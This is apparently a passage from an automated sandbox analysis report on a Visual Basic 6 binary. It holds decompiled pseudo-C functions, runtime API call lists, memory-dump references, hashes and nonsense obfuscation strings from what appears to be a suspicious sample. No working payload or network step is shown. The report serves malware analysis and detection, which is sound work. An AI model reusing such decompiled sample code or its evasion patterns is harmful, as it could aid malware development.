      • __vbaFreeStr.MSVBVM60(0041F9EC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F9D6
      • __vbaFreeStr.MSVBVM60(0041F9EC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F9DE
      • __vbaFreeStr.MSVBVM60(0041F9EC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F9E6
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$Move$CheckFileHresult$#526#618#666#696#697ChkstkCloseGet3ListNew2Open
      • String ID: Rutiner$Sciuroid8$\qc17$appdata
      • API String ID: 862176544-1118470403
      • Opcode ID: c69763984ed7b4e3ac494bddae3cdf9026df691943ab16383f2991c5f1a0908a
      • Instruction ID: 7c428f09ce7703e27237ff70277566373f65784c74b6a6c4de62ce841f798d38
      • Opcode Fuzzy Hash: c69763984ed7b4e3ac494bddae3cdf9026df691943ab16383f2991c5f1a0908a
      • Instruction Fuzzy Hash: C5510C71900218AEDB10EBA1CC46FDEB7B8AF04708F50417AF105B71E1DB785A89CB69
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 63%
      			E0041E93A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				void* _v28;
      				void* _v32;
      				void* _v36;
      				short _v40;
      				char _v44;
      				void* _v48;
      				intOrPtr _v56;
      				char _v64;
      				char _v80;
      				void* _v100;
      				char _v104;
      				void* _v108;
      				signed int _v112;
      				intOrPtr* _v116;
      				signed int _v120;
      				signed int _v132;
      				intOrPtr* _v136;
      				signed int _v140;
      				signed int _v144;
      				char* _t86;
      				char* _t87;
      				signed int _t91;
      				signed int _t98;
      				short _t102;
      				signed int _t108;
      				signed int _t113;
      				void* _t134;
      				void* _t136;
      				intOrPtr _t137;
      
      				_t137 = _t136 - 0xc;
      				 *[fs:0x0] = _t137;
      				L00401540();
      				_v16 = _t137;
      				_v12 = 0x401330;
      				_v8 = 0;
      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x401546, _t134);
      				L00401708();
      				_t86 =  &_v44;
      				L00401858();
      				L004016D8();
      				L0040183A();
      				L00401846();
      				L00401828();
      				L00401792();
      				_t87 =  &_v48;
      				L00401798();
      				_v108 = _t87;
      				_t91 =  *((intOrPtr*)( *_v108 + 0x1c))(_v108,  &_v104, _t87, _t86, L"Flimflam", L"Fribords2", _t86, _t86,  &_v64, 1, 0xffffffff, 0,  &_v64, 0xe8);
      				asm("fclex");
      				_v112 = _t91;
      				if(_v112 >= 0) {
      					_v132 = _v132 & 0x00000000;
      				} else {
      					_push(0x1c);
      					_push(0x402650);
      					_push(_v108);
      					_push(_v112);
      					L004017C8();
      					_v132 = _t91;
      				}
      				_v56 = _v104;
      				_v64 = 3;
      				_push( &_v64);
      				_push( &_v80);
      				L00401678();
      				_push( &_v80);
      				L00401834();
      				L0040183A();
      				L004017C2();
      				_push( &_v80);
      				_push( &_v64);
      				_push(2);
      				L00401840();
      				_v56 = 0x7042c;
      				_v64 = 3;
      				_t98 =  &_v64;
      				_push(_t98);
      				L004017E6();
      				L0040183A();
      				_push(_t98);
      				_push(L"INVALIDNESS");
      				L0040172C();
      				asm("sbb eax, eax");
      				_v108 =  ~( ~_t98 + 1);
      				L00401846();
      				L00401828();
      				_t102 = _v108;
      				if(_t102 != 0) {
      					L00401672();
      					L0040183A();
      					if( *0x4223c0 != 0) {
      						_v136 = 0x4223c0;
      					} else {
      						_push(0x4223c0);
      						_push(0x4025a0);
      						L004017CE();
      						_v136 = 0x4223c0;
      					}
      					_v108 =  *_v136;
      					_t108 =  *((intOrPtr*)( *_v108 + 0x14))(_v108,  &_v48);
      					asm("fclex");
      					_v112 = _t108;
      					if(_v112 >= 0) {
      						_v140 = _v140 & 0x00000000;
      					} else {
      						_push(0x14);
      						_push(0x402590);
      						_push(_v108);
      						_push(_v112);
      						L004017C8();
      						_v140 = _t108;
      					}
      					_v116 = _v48;
      					_t113 =  *((intOrPtr*)( *_v116 + 0x68))(_v116,  &_v100);
      					asm("fclex");
      					_v120 = _t113;
      					if(_v120 >= 0) {
      						_v144 = _v144 & 0x00000000;
      					} else {
      						_push(0x68);
      						_push(0x4025b0);
      						_push(_v116);
      						_push(_v120);
      						L004017C8();
      						_v144 = _t113;
      					}
      					_t102 = _v100;
      					_v40 = _t102;
      					L004017C2();
      				}
      				_push(0x41ebbd);
      				L00401846();
      				L00401846();
      				L00401846();
      				return _t102;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041E956
      • #526.MSVBVM60(?,000000E8,?,?,?,?,00401546), ref: 0041E983
      • __vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E996
      • #712.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E9A6
      • __vbaStrMove.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E9B0
      • __vbaFreeStr.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E9B8
      • __vbaFreeVar.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E9C0
      • #685.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E9C5
      • __vbaObjSet.MSVBVM60(00000000,00000000,Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8), ref: 0041E9CF
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402650,0000001C), ref: 0041E9FE
      • #613.MSVBVM60(?,00000003), ref: 0041EA21
      • __vbaStrVarMove.MSVBVM60(?,?,00000003), ref: 0041EA2A
      • __vbaStrMove.MSVBVM60(?,?,00000003), ref: 0041EA34
      • __vbaFreeObj.MSVBVM60(?,?,00000003), ref: 0041EA3C
      • __vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003), ref: 0041EA4B
      • #574.MSVBVM60(00000003), ref: 0041EA65
      • __vbaStrMove.MSVBVM60(00000003), ref: 0041EA6F
      • __vbaStrCmp.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EA7A
      • __vbaFreeStr.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EA8D
      • __vbaFreeVar.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EA95
      • #611.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EAA6
      • __vbaStrMove.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EAB0
      • __vbaNew2.MSVBVM60(004025A0,004223C0,INVALIDNESS,00000000,00000003), ref: 0041EAC8
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 0041EB15
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000068), ref: 0041EB56
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B0,00000068), ref: 0041EB75
      • __vbaFreeStr.MSVBVM60(0041EBBD,INVALIDNESS,00000000,00000003), ref: 0041EBA7
      • __vbaFreeStr.MSVBVM60(0041EBBD,INVALIDNESS,00000000,00000003), ref: 0041EBAF
      • __vbaFreeStr.MSVBVM60(0041EBBD,INVALIDNESS,00000000,00000003), ref: 0041EBB7
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$Move$CheckHresult$#526#574#611#613#685#712ChkstkListNew2
      • String ID: Flimflam$Fribords2$INVALIDNESS
      • API String ID: 2258197736-3412120936
      • Opcode ID: d04e487ac84ff9532184497aa78f7e70fb8b61bc5d7d33464f59b40d53c6ee17
      • Instruction ID: 355c1c2ac91816339976770618c11783678ba40fc02f8777b14d40bb2027be04
      • Opcode Fuzzy Hash: d04e487ac84ff9532184497aa78f7e70fb8b61bc5d7d33464f59b40d53c6ee17
      • Instruction Fuzzy Hash: 05710875D00218AFDB00EBA6C885BDDBBB8BF08704F50812AF505BB1E1DB786A45CF58
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 61%
      			E0041EDE4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20, void* _a28) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _v24;
      				void* _v28;
      				void* _v32;
      				void* _v36;
      				void* _v40;
      				char _v44;
      				signed int _v48;
      				char _v52;
      				intOrPtr _v56;
      				intOrPtr _v60;
      				char _v68;
      				char* _v92;
      				char _v100;
      				char* _v108;
      				char _v116;
      				void* _v120;
      				signed int _v124;
      				intOrPtr* _v128;
      				signed int _v132;
      				signed int _v140;
      				intOrPtr* _v144;
      				signed int _v148;
      				signed int _v152;
      				intOrPtr* _v156;
      				signed int _v160;
      				signed int _v164;
      				short _t110;
      				char* _t112;
      				signed int _t118;
      				signed int _t123;
      				signed int _t130;
      				char* _t133;
      				signed int _t136;
      				intOrPtr _t168;
      
      				_push(0x401546);
      				_push( *[fs:0x0]);
      				 *[fs:0x0] = _t168;
      				L00401540();
      				_v12 = _t168;
      				_v8 = 0x401368;
      				L004017B6();
      				L004017B6();
      				L004017B6();
      				_v92 =  &_v44;
      				_v100 = 0x4008;
      				_push( &_v100);
      				_push( &_v68);
      				L0040181C();
      				_v108 = L"ICHTHYOPOLISM";
      				_v116 = 0x8008;
      				_push( &_v68);
      				_t110 =  &_v116;
      				_push(_t110);
      				L00401660();
      				_v120 = _t110;
      				L00401828();
      				if(_v120 != 0) {
      					if( *0x4223c0 != 0) {
      						_v144 = 0x4223c0;
      					} else {
      						_push(0x4223c0);
      						_push(0x4025a0);
      						L004017CE();
      						_v144 = 0x4223c0;
      					}
      					_v120 =  *_v144;
      					_t118 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v52);
      					asm("fclex");
      					_v124 = _t118;
      					if(_v124 >= 0) {
      						_v148 = _v148 & 0x00000000;
      					} else {
      						_push(0x14);
      						_push(0x402590);
      						_push(_v120);
      						_push(_v124);
      						L004017C8();
      						_v148 = _t118;
      					}
      					_v128 = _v52;
      					_t123 =  *((intOrPtr*)( *_v128 + 0xd8))(_v128,  &_v48);
      					asm("fclex");
      					_v132 = _t123;
      					if(_v132 >= 0) {
      						_v152 = _v152 & 0x00000000;
      					} else {
      						_push(0xd8);
      						_push(0x4025b0);
      						_push(_v128);
      						_push(_v132);
      						L004017C8();
      						_v152 = _t123;
      					}
      					_v140 = _v48;
      					_v48 = _v48 & 0x00000000;
      					L0040183A();
      					L004017C2();
      					if( *0x4223c0 != 0) {
      						_v156 = 0x4223c0;
      					} else {
      						_push(0x4223c0);
      						_push(0x4025a0);
      						L004017CE();
      						_v156 = 0x4223c0;
      					}
      					_v120 =  *_v156;
      					_t130 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v52);
      					asm("fclex");
      					_v124 = _t130;
      					if(_v124 >= 0) {
      						_v160 = _v160 & 0x00000000;
      					} else {
      						_push(0x14);
      						_push(0x402590);
      						_push(_v120);
      						_push(_v124);
      						L004017C8();
      						_v160 = _t130;
      					}
      					_v128 = _v52;
      					_v108 = 0x80020004;
      					_v116 = 0xa;
      					_v60 = 0x92ac1b00;
      					_v56 = 0x5af5;
      					_v68 = 6;
      					L00401540();
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					_t133 =  &_v68;
      					L0040165A();
      					L0040183A();
      					_t136 =  *((intOrPtr*)( *_v128 + 0x13c))(_v128, _t133, _t133, 0xffffffff, 0xfffffffe, 0xfffffffe, 0xfffffffe, 0x10);
      					asm("fclex");
      					_v132 = _t136;
      					if(_v132 >= 0) {
      						_v164 = _v164 & 0x00000000;
      					} else {
      						_push(0x13c);
      						_push(0x4025b0);
      						_push(_v128);
      						_push(_v132);
      						L004017C8();
      						_v164 = _t136;
      					}
      					L00401846();
      					L004017C2();
      					L00401828();
      				}
      				_v60 = 0x607e9f;
      				_v68 = 3;
      				_t112 =  &_v68;
      				_push(_t112);
      				L0040166C();
      				L0040183A();
      				L00401828();
      				_v24 = 0x5b2ec5;
      				_push(0x41f103);
      				L00401846();
      				L00401846();
      				L00401846();
      				L00401846();
      				L00401846();
      				return _t112;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041EE01
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EE19
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EE24
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EE31
      • #524.MSVBVM60(?,00004008), ref: 0041EE4B
      • __vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041EE66
      • __vbaFreeVar.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041EE72
      • __vbaNew2.MSVBVM60(004025A0,004223C0,00008008,?,?,?,?,00004008), ref: 0041EE96
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EEE3
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,000000D8,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EF2A
      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EF54
      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EF5C
      • __vbaNew2.MSVBVM60(004025A0,004223C0,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EF74
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014,?,?,?,?,?,?,?,00008008,?,?,?,?), ref: 0041EFC1
      • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F001
      • #703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F01B
      • __vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F025
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,0000013C,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F054
      • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F06B
      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F073
      • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F07B
      • #536.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F092
      • __vbaStrMove.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F09C
      • __vbaFreeVar.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F0A4
      • __vbaFreeStr.MSVBVM60(0041F103,00000003,00008008,?,?,?,?,00004008), ref: 0041F0DD
      • __vbaFreeStr.MSVBVM60(0041F103,00000003,00008008,?,?,?,?,00004008), ref: 0041F0E5
      • __vbaFreeStr.MSVBVM60(0041F103,00000003,00008008,?,?,?,?,00004008), ref: 0041F0ED
      • __vbaFreeStr.MSVBVM60(0041F103,00000003,00008008,?,?,?,?,00004008), ref: 0041F0F5
      • __vbaFreeStr.MSVBVM60(0041F103,00000003,00008008,?,?,?,?,00004008), ref: 0041F0FD
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$CheckHresult$CopyMove$ChkstkNew2$#524#536#703
      • String ID: Gurgledes$ICHTHYOPOLISM
      • API String ID: 2536202667-1995639141
      • Opcode ID: dde2ad451a0e109637174636e54121a6f31446d6cbbefaa9bf4267809e36ca7f
      • Instruction ID: 77930b54b084aa1f6d5c2f66190b20487ba8b70db1681777619c98ad140c7449
      • Opcode Fuzzy Hash: dde2ad451a0e109637174636e54121a6f31446d6cbbefaa9bf4267809e36ca7f
      • Instruction Fuzzy Hash: 07910571D00218EFDB10EFA5C985BDDBBB5BF09308F20816AE405B72A2DB785A45CF58
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 49%
      			E0041F11E(void* __ebx, void* __edi, void* __esi, void* _a16, void* _a20, signed int* _a24) {
      				intOrPtr _v12;
      				intOrPtr _v16;
      				void* _v28;
      				void* _v32;
      				void* _v48;
      				void* _v52;
      				void* _v56;
      				char _v60;
      				char _v64;
      				intOrPtr _v72;
      				char _v80;
      				intOrPtr _v88;
      				char _v96;
      				char _v112;
      				char* _v120;
      				intOrPtr _v128;
      				signed int* _v136;
      				char _v144;
      				signed int _v148;
      				short _v152;
      				signed int _v164;
      				signed int* _t54;
      				signed int _t56;
      				short _t58;
      				char* _t61;
      				char* _t67;
      				void* _t95;
      				intOrPtr _t96;
      
      				_t96 = _t95 - 0xc;
      				_push(0x401546);
      				_push( *[fs:0x0]);
      				 *[fs:0x0] = _t96;
      				L00401540();
      				_v16 = _t96;
      				_v12 = 0x401380;
      				L004017B6();
      				L004017B6();
      				_t54 = _a24;
      				 *_t54 =  *_t54 & 0x00000000;
      				_push(L"Dukkestuer");
      				L00401762();
      				_v136 = _t54;
      				_v144 = 0x8003;
      				_v72 =  *0x401378;
      				_v80 = 4;
      				_push( &_v96);
      				_t56 =  &_v80;
      				_push(_t56);
      				L004017A4();
      				_v148 = _t56;
      				if(_v148 >= 0) {
      					_v164 = _v164 & 0x00000000;
      				} else {
      					_push(_v148);
      					L0040179E();
      					_v164 = _t56;
      				}
      				_push( &_v144);
      				_t58 =  &_v96;
      				_push(_t58);
      				L004016AE();
      				_v152 = _t58;
      				_push( &_v96);
      				_push( &_v80);
      				_push(2);
      				L00401840();
      				_t61 = _v152;
      				if(_t61 != 0) {
      					_push( &_v80);
      					L00401654();
      					L0040174A();
      					_v88 = 5;
      					_v96 = 2;
      					_v120 = L"LAAGETS";
      					_v128 = 8;
      					L0040184C();
      					_push( &_v96);
      					_push(5);
      					_push( &_v80);
      					_push( &_v112);
      					L0040168A();
      					_push(0);
      					_push(0xffffffff);
      					_push(1);
      					_push( &_v112);
      					_t67 =  &_v60;
      					_push(_t67);
      					L00401858();
      					_push(_t67);
      					_push(L"SNVRET");
      					_push(L"OVERBEBYRDES");
      					L004016D8();
      					L0040183A();
      					_push(_t67);
      					L004017B0();
      					L0040183A();
      					_push( &_v64);
      					_push( &_v60);
      					_push(2);
      					L004017D4();
      					_push( &_v112);
      					_push( &_v96);
      					_t61 =  &_v80;
      					_push(_t61);
      					_push(3);
      					L00401840();
      				}
      				L004017B6();
      				asm("wait");
      				_push(0x41f326);
      				L00401846();
      				L00401846();
      				L00401828();
      				L00401846();
      				return _t61;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041F13C
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F154
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F15F
      • __vbaLenBstrB.MSVBVM60(Dukkestuer,?,?,?,?,00401546), ref: 0041F16F
      • #564.MSVBVM60(00000004,?), ref: 0041F19C
      • __vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041F1B6
      • __vbaVarTstLt.MSVBVM60(?,00008003,?,?,?,00000004,?), ref: 0041F1D5
      • __vbaFreeVarList.MSVBVM60(00000002,00000004,?,?,00008003,?,?,?,00000004,?), ref: 0041F1EB
      • #546.MSVBVM60(?,?,?,00401546), ref: 0041F206
      • __vbaVarMove.MSVBVM60(?,?,?,00401546), ref: 0041F211
      • __vbaVarDup.MSVBVM60 ref: 0041F238
      • #629.MSVBVM60(?,?,00000005,00000002), ref: 0041F24B
      • __vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F25E
      • #712.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F26E
      • __vbaStrMove.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F278
      • #527.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F27E
      • __vbaStrMove.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F288
      • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F297
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,00401546), ref: 0041F2AD
      • __vbaStrCopy.MSVBVM60(?,?,00401546), ref: 0041F2BD
      • __vbaFreeStr.MSVBVM60(0041F326,?,?,00401546), ref: 0041F308
      • __vbaFreeStr.MSVBVM60(0041F326,?,?,00401546), ref: 0041F310
      • __vbaFreeVar.MSVBVM60(0041F326,?,?,00401546), ref: 0041F318
      • __vbaFreeStr.MSVBVM60(0041F326,?,?,00401546), ref: 0041F320
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Free$CopyListMove$#527#546#564#629#712BstrCheckChkstkHresult
      • String ID: Antievangelical9$Dukkestuer$LAAGETS$OVERBEBYRDES$SNVRET
      • API String ID: 3927249403-1920341584
      • Opcode ID: 11630a238eb85b9f8f4a77870bef1f6570c2d1273dd1a386d5056b05daf4b5b8
      • Instruction ID: f2d15253067c6071e3169fb37671c2c9716ff9cab3d009f5c391d9107434bfc0
      • Opcode Fuzzy Hash: 11630a238eb85b9f8f4a77870bef1f6570c2d1273dd1a386d5056b05daf4b5b8
      • Instruction Fuzzy Hash: 11510A72D0020DABDB10EBE1C846FDEB778AF04708F50817BB515B71E1EB785A498B99
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 49%
      			E0041E7A9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a16) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				void* _v28;
      				void* _v32;
      				void* _v36;
      				char _v52;
      				intOrPtr _v60;
      				char _v68;
      				char _v84;
      				char* _v92;
      				intOrPtr _v100;
      				signed int* _t37;
      				char* _t40;
      				void* _t64;
      				void* _t66;
      				intOrPtr _t67;
      
      				_t67 = _t66 - 0xc;
      				 *[fs:0x0] = _t67;
      				L00401540();
      				_v16 = _t67;
      				_v12 = 0x401320;
      				_v8 = 0;
      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x64,  *[fs:0x0], 0x401546, _t64);
      				_t37 = _a16;
      				 *_t37 =  *_t37 & 0x00000000;
      				_push(0xb5);
      				_push(L"SKADESLSHOLDELSERNE");
      				_push(L"Fritgaaende");
      				_push(0);
      				L00401690();
      				if(_t37 == 0xa2) {
      					_v60 = 0xfe;
      					_v68 = 2;
      					_v92 = L"Flskekdet";
      					_v100 = 8;
      					L0040184C();
      					_push( &_v68);
      					_push(0x48);
      					_push( &_v52);
      					_push( &_v84);
      					L0040168A();
      					_push( &_v84);
      					L00401834();
      					L0040183A();
      					_push( &_v84);
      					_push( &_v68);
      					_push( &_v52);
      					_push(3);
      					L00401840();
      					_push(0x4f);
      					_push(0x9e);
      					_push(0x14);
      					_push( &_v52);
      					L00401684();
      					_t37 =  &_v52;
      					_push(_t37);
      					L00401834();
      					L0040183A();
      					L00401828();
      				}
      				_push(L"GILENO");
      				L004017EC();
      				_push(_t37);
      				_push( &_v52);
      				L0040167E();
      				_t40 =  &_v52;
      				_push(_t40);
      				L00401834();
      				L0040183A();
      				L00401828();
      				_push(0x41e913);
      				L00401846();
      				L00401846();
      				return _t40;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041E7C5
      • __vbaInStrB.MSVBVM60(00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E800
      • __vbaVarDup.MSVBVM60 ref: 0041E832
      • #629.MSVBVM60(?,00000000,00000048,00000002), ref: 0041E845
      • __vbaStrVarMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041E84E
      • __vbaStrMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041E858
      • __vbaFreeVarList.MSVBVM60(00000003,00000000,00000002,?,?,?,00000000,00000048,00000002), ref: 0041E86B
      • #539.MSVBVM60(?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E880
      • __vbaStrVarMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E889
      • __vbaStrMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E893
      • __vbaFreeVar.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041E89B
      • #696.MSVBVM60(GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E8A5
      • #698.MSVBVM60(00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E8B2
      • __vbaStrVarMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E8BB
      • __vbaStrMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E8C5
      • __vbaFreeVar.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E8CD
      • __vbaFreeStr.MSVBVM60(0041E913,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E905
      • __vbaFreeStr.MSVBVM60(0041E913,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041E90D
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp
      Similarity
      • API ID: __vba$Move$Free$#539#629#696#698ChkstkList
      • String ID: Flskekdet$Fritgaaende$GILENO$SKADESLSHOLDELSERNE
      • API String ID: 1195518721-3815085929
      • Opcode ID: 0b36de2d1b9baa1a6980a534749f51b899f99906f35ee924853dc31c01512f3f
      • Instruction ID: 777f9abc72e3724b6f8c0b7e3feb8a44b471e464ddebcb32a68dee43277907db
      • Opcode Fuzzy Hash: 0b36de2d1b9baa1a6980a534749f51b899f99906f35ee924853dc31c01512f3f
      • Instruction Fuzzy Hash: 7531E972950258ABDB00FBD1DD86FEE77B8AF04704F54442AB501BB1E1DB789A098B58
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 28%
      			E00420767(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4) {
      				char _v8;
      				intOrPtr _v16;
      				intOrPtr _v20;
      				intOrPtr _v24;
      				intOrPtr _v28;
      				intOrPtr _v40;
      				void* _v44;
      				void* _v48;
      				intOrPtr _v52;
      				void* _v56;
      				intOrPtr _v64;
      				char _v72;
      				char _v88;
      				intOrPtr _v96;
      				char _v104;
      				char _v120;
      				intOrPtr _v128;
      				char _v136;
      				intOrPtr _v144;
      				char _v152;
      				short _v220;
      				signed int _v224;
      				intOrPtr* _v228;
      				signed int _v232;
      				intOrPtr* _v256;
      				signed int _v260;
      				signed int _v264;
      				char* _t91;
      				short _t93;
      				short _t100;
      				signed int _t106;
      				signed int _t110;
      				void* _t122;
      				void* _t124;
      				intOrPtr _t125;
      
      				_t125 = _t124 - 0x18;
      				 *[fs:0x0] = _t125;
      				L00401540();
